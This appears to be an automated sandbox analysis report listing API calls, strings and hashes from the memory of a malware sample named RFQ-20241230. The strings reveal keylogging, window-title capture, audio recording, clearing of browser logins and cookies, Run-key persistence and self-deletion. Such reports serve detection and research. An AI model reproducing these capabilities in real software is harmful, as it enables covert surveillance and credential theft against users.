                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                            • String ID: /sort "Visit Time" /stext "$8>G
                            • API String ID: 368326130-2663660666
                            • Opcode ID: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                            • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                            • Opcode Fuzzy Hash: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                            • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                            • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTimewsprintf
                            • String ID: Offline Keylogger Started
                            • API String ID: 465354869-4114347211
                            • Opcode ID: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                            • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                            • Opcode Fuzzy Hash: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                            • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                            APIs
                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTime$wsprintf
                            • String ID: Online Keylogger Started
                            • API String ID: 112202259-1258561607
                            • Opcode ID: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                            • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                            • Opcode Fuzzy Hash: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                            • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                            APIs
                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                            • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                            • __dosmaperr.LIBCMT ref: 0044AB0E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID: `@
                            • API String ID: 2583163307-951712118
                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                            • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                            • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandleObjectSingleWait
                            • String ID: Connection Timeout
                            • API String ID: 2055531096-499159329
                            • Opcode ID: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                            • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                            • Opcode Fuzzy Hash: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
                            • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                              • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                              • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                            • String ID: bad locale name
                            • API String ID: 3628047217-1405518554
                            • Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                            • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                            • Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                            • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: /C $cmd.exe$open
                            • API String ID: 587946157-3896048727
                            • Opcode ID: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                            • Opcode Fuzzy Hash: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                            APIs
                            • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                            • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: TerminateThread$HookUnhookWindows
                            • String ID: pth_unenc
                            • API String ID: 3123878439-4028850238
                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                            APIs
                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: GetCursorInfo$User32.dll
                            • API String ID: 1646373207-2714051624
                            • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                            • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                            • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                            • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                            APIs
                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetLastInputInfo$User32.dll
                            • API String ID: 2574300362-1519888992
                            • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                            • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                            • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                            • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                            • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                            • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                            • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 3664c7d1b7189549baf4d493e5c665213dd82d933dd96c7687bae007d5c3c42b
                            • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                            • Opcode Fuzzy Hash: 3664c7d1b7189549baf4d493e5c665213dd82d933dd96c7687bae007d5c3c42b
                            • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                            • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                            • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                            • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                            • String ID:
                            • API String ID: 3360349984-0
                            • Opcode ID: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                            • Opcode Fuzzy Hash: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                            APIs
                            Strings
                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                            • API String ID: 3472027048-1236744412
                            • Opcode ID: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                            • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                            • Opcode Fuzzy Hash: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
                            • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                            APIs
                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQuerySleepValue
                            • String ID: @CG$exepath$BG
                            • API String ID: 4119054056-3221201242
                            • Opcode ID: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                            • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                            • Opcode Fuzzy Hash: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
                            • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                            APIs
                              • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                              • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                              • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                            • API ID: Window$SleepText$ForegroundLength
                            • String ID: [ $ ]
                            • API String ID: 3309952895-93608704
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                            • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            APIs
                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                              • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                              • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                            • _UnwindNestedFrames.LIBCMT ref: 00438134
                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                            • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                            • String ID:
                            • API String ID: 737400349-0
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                            • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                            • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                            • API ID: File$CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 3919263394-0
                            APIs
                            • GetSystemMetrics.USER32(0000004C), ref: 00418529
                            • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                            • GetSystemMetrics.USER32(0000004E), ref: 00418535
                            • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                            • API ID: MetricsSystem
                            • String ID:
                            • API String ID: 4116985748-0
                            APIs
                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                            • API ID: CloseHandleOpenProcess
                            • String ID:
                            • API String ID: 39102293-0
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                            • API ID: ErrorHandling__start
                            • String ID: pow
                            • API String ID: 3213639722-2276729525
                            APIs
                            • API ID: _memcmp
                            • String ID: 4[G$4[G
                            • API String ID: 2931989736-4028565467
                            APIs
                            • API ID: CountEventTick
                            • String ID: >G
                            • API String ID: 180926312-1296849874
                            APIs
                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                            • API ID: Info
                            • String ID: $vD
                            • API String ID: 1807457897-3636070802
                            APIs
                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                            • API ID:
                            • String ID: ACP$OCP
                            • API String ID: 0-711371036
                            APIs
                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                            • API ID: LocalTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 481472006-1507639952
                            APIs
                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • API ID: LocalTime
                            • String ID: | $%02i:%02i:%02i:%03i
                            • API String ID: 481472006-2430845779
                            APIs
                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                            • String ID: Online Keylogger Stopped
                            • API String ID: 1623830855-1496645233
                            APIs
                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                            • API ID: wave$BufferHeaderPrepare
                            • String ID: T=G
                            • API String ID: 2315374483-379896819
                            APIs
                            • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                            • API ID: LocaleValid
                            • String ID: IsValidLocaleName$z=D
                            • API String ID: 1901932003-2791046955
                            APIs
                            • API ID: H_prolog
                            • String ID: T=G$T=G
                            • API String ID: 3519838083-3732185208
                            APIs
                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                              • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                            • String ID: [AltL]$[AltR]
                            • API String ID: 2738857842-2658077756
                            APIs
                            • _free.LIBCMT ref: 00448835
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • API ID: ErrorFreeHeapLast_free
                            • String ID: `@$`@
                            • API String ID: 1353095263-20545824
                            APIs
                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                            • API ID: State
                            • String ID: [CtrlL]$[CtrlR]
                            • API String ID: 1649606143-2446555240
                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: DeleteOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                            • API String ID: 2654517830-1051519024
                            APIs
                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: DeleteDirectoryFileRemove
                            • String ID: pth_unenc
                            • API String ID: 3325800564-4028850238
                            APIs
                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: ObjectProcessSingleTerminateWait
                            • String ID: pth_unenc
                            • API String ID: 1872346434-4028850238
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                            • GetLastError.KERNEL32 ref: 0043FB12
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0